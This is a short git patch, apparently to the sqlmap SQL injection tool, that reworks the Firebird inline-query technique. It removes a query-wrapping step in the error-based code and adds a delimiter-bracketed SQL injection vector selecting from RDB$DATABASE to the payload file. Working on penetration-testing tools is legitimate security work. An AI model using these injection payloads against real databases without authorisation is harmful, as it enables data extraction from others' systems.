From d6a361f859776245ff3f674a687ef559e0ebef07 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 22 Jan 2013 16:31:26 +0100
Subject: [PATCH] Proper implementation for --technique=Q --dbms=Firebird

---
 lib/techniques/error/use.py | 3 ---
 xml/payloads.xml            | 2 +-
 2 files changed, 1 insertion(+), 4 deletions(-)

diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index b6ea7f79f..54b509b73 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -181,9 +181,6 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e
         else:
             expressionReplaced = expression.replace(expressionFields, field, 1)
 
-        if kb.technique == PAYLOAD.TECHNIQUE.QUERY and Backend.isDbms(DBMS.FIREBIRD) and expressionReplaced.startswith("SELECT "):
-            expressionReplaced = "SELECT %s" % agent.concatQuery(expressionReplaced)
-
         output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse(expressionReplaced, field)
 
         if not kb.threadContinue:
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 0db1df5d9..8f6652061 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -2003,7 +2003,7 @@ Formats:
         <risk>1</risk>
         <clause>1,2,3,8</clause>
         <where>3</where>
-        <vector>[QUERY]</vector>
+        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE</vector>
         <request>
             <payload>SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE</payload>
         </request>